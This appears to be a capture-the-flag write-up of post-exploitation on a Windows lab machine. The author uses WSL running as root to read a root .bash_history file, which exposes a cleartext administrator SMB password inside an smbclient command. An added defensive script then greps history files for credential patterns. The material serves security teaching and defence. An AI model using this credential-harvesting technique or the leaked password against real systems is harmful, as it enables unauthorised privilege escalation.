WSL


Windows Subsystem for Linux (WSL) is a compatibility layer for running Linux binaries (in ELF format) natively on Windows 10, Windows 11 and Windows Server 2019 without the need for a separate virtual machine or dual booting. There are two versions of WSL: WSL and WSL2.

During the post enumeration, I was able to discover that the target system has WSL installed from multiple sources, including the presence of bash.exe in the home directory of the tyler user, an Ubuntu installation package at the system root and finally wsl.exe enumerated by PEAS.

According to PEAS, the wsl.exe binary is located at c:\Windows\System32\wsl.exe

PS C:\> \Windows\System32\wsl.exe id
uid=0(root) gid=0(root) groups=0(root)
PS C:\> \Windows\System32\wsl.exe whoami
root
PS C:\> \Windows\System32\wsl.exe hostname
SECNOTES

I am able to interact with the filesystem as if it was a Linux environment via the wsl binary at c:\Windows\System32\wsl.exe. It shows that I am currently the root user. Does that mean that the wsl process is running with privileges of the administrator user?

PS C:\> \Windows\System32\wsl.exe pwd
/mnt/c

The current directory is /mnt/c. This tells me that the whole filesystem is mounted to the /mnt directory.

PS C:\> \Windows\System32\wsl.exe ls -la Users/Administrator
\Windows\System32\wsl.exe : ls: cannot open directory 'Users/Administrator': Permission denied
At line:1 char:1
+ \Windows\System32\wsl.exe ls -la Users/Administrator
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (ls: cannot open...rmission denied:String) [], RemoteE 
   xception
    + FullyQualifiedErrorId : NativeCommandError

Attempting to check the /mnt/c/users/administrator (c:\Users\Administrator) directory fails with a permission error. So I guess I still don’t have access to it although I am running the WSL session as the root user.

System root


PS C:\> \Windows\System32\wsl.exe ls -la ../
total 0
drwxr-xr-x 1 root root 512 Jun 21  2018 .
drwxr-xr-x 1 root root 512 Jun 21  2018 ..
drwxrwxrwx 1 root root 512 Jan 24 23:09 c
PS C:\> \Windows\System32\wsl.exe ls -la ../../
total 88
drwxr-xr-x  1 root root   512 Jun 21  2018 .
drwxr-xr-x  1 root root   512 Jun 21  2018 ..
drwxr-xr-x  1 root root   512 Jun 21  2018 bin
drwxr-xr-x  1 root root   512 Apr 25  2018 boot
drwxr-xr-x  1 root root   512 Jan 24 23:56 dev
drwxr-xr-x  1 root root   512 Jun 22  2018 etc
drwxr-xr-x  1 root root   512 Apr 24  2018 home
-rwxr-xr-x  1 root root 87944 Dec 31  1969 init
drwxr-xr-x  1 root root   512 Apr 25  2018 lib
drwxr-xr-x  1 root root   512 Apr 25  2018 lib64
drwxr-xr-x  1 root root   512 Apr 25  2018 media
drwxr-xr-x  1 root root   512 Jun 21  2018 mnt
drwxr-xr-x  1 root root   512 Apr 25  2018 opt
dr-xr-xr-x  8 root root     0 Jan 24 23:56 proc
drwx------  1 root root   512 Jun 22  2018 root
drwxr-xr-x  1 root root   512 Jan 24 23:56 run
drwxr-xr-x  1 root root   512 Jun 22  2018 sbin
drwxr-xr-x  1 root root   512 Apr 16  2018 snap
drwxr-xr-x  1 root root   512 Apr 25  2018 srv
dr-xr-xr-x 12 root root     0 Jan 24 23:56 sys
drwxrwxrwt  1 root root   512 Jun 22  2018 tmp
drwxr-xr-x  1 root root   512 Apr 25  2018 usr
drwxr-xr-x  1 root root   512 Apr 25  2018 var

When I list out the parent directory of the parent directory of the current directory (/mnt/c), I see the familiar Linux system root

PS C:\> \Windows\System32\wsl.exe ls -la ../../home
total 0
drwxr-xr-x 1 root root 512 Apr 24  2018 .
drwxr-xr-x 1 root root 512 Jun 21  2018 ..

There is no one at the home directory

/root


PS C:\> \Windows\System32\wsl.exe ls -la ../../root
total 8
drwx------ 1 root root  512 Jun 22  2018 .
drwxr-xr-x 1 root root  512 Jun 21  2018 ..
---------- 1 root root  398 Jun 22  2018 .bash_history
-rw-r--r-- 1 root root 3112 Jun 22  2018 .bashrc
-rw-r--r-- 1 root root  148 Aug 17  2015 .profile
drwxrwxrwx 1 root root  512 Jun 22  2018 filesystem

The home directory of the root user has the .bash_history file with 398 bytes of content

CLEARTEXT Credential


PS C:\> \Windows\System32\wsl.exe cat ../../root/.bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history 
less .bash_history
exit

Aha! I see a list of commands that were entered before, and one of them has a CLEARTEXT credential in it:

smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$

The command above connected to the SMB server with the credential of the administrator user.
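
From the defender's side, the exposure above is a password typed on a command line and then persisted in a shell history file inside the WSL distribution. The following audit script is an added example, not part of the original write-up; the regular expression, the function names and the sample history (with a placeholder password) are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: find shell-history lines that carry a password on the
# command line. Patterns are assumptions modelled on the history shown above.

# ERE alternatives, one per credential-on-command-line shape:
#   -U user%password          (smbclient-style)
#   password=... / pass=...   (mount -o options)
#   sshpass -p ...
CRED_RE='(^|[[:space:]])-U[[:space:]]*[^[:space:]%]+%[^[:space:]]|(^|[,[:space:]])(password|pass)=[^,[:space:]]|(^|[[:space:]])sshpass[[:space:]]+-p'

# scan_history FILE: print FILE:LINE for each hit; the secret is never echoed.
scan_history() {
    grep -nE -e "$CRED_RE" -- "$1" 2>/dev/null | cut -d: -f1 |
    while read -r n; do printf '%s:%s\n' "$1" "$n"; done
}

# scan_tree DIR: scan every history file under DIR (for example / inside the
# distro). -xdev keeps find out of mounted Windows drives such as /mnt/c.
scan_tree() {
    find "$1" -xdev -type f \( -name .bash_history -o -name .zsh_history \) 2>/dev/null |
    while IFS= read -r f; do scan_history "$f"; done
}

# make_sample DIR: constructed history file with a placeholder password.
make_sample() {
    mkdir -p "$1/root"
    cat > "$1/root/.bash_history" <<'EOF'
cd /mnt/c/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
smbclient
smbclient -U 'administrator%EXAMPLE-Passw0rd' \\\\127.0.0.1\\c$
mount -t cifs //127.0.0.1/c$ filesystem/ -o user=administrator,password=EXAMPLE-Passw0rd
exit
EOF
}

# Stand-alone use: sh audit.sh /   (run as root inside the distribution)
if [ $# -gt 0 ]; then scan_tree "$1"; fi
```

Any line it reports means the credential should be rotated and the command replaced with one that reads the secret from a protected file, such as smbclient's `-A` authentication file or the `credentials=` option of mount.cifs.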

Distro?


PS C:\> \Windows\System32\wsl.exe cat ../../etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=18.04
DISTRIB_CODENAME=bionic
DISTRIB_DESCRIPTION="Ubuntu 18.04 LTS"
NAME="Ubuntu"
VERSION="18.04 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

It was Ubuntu all along.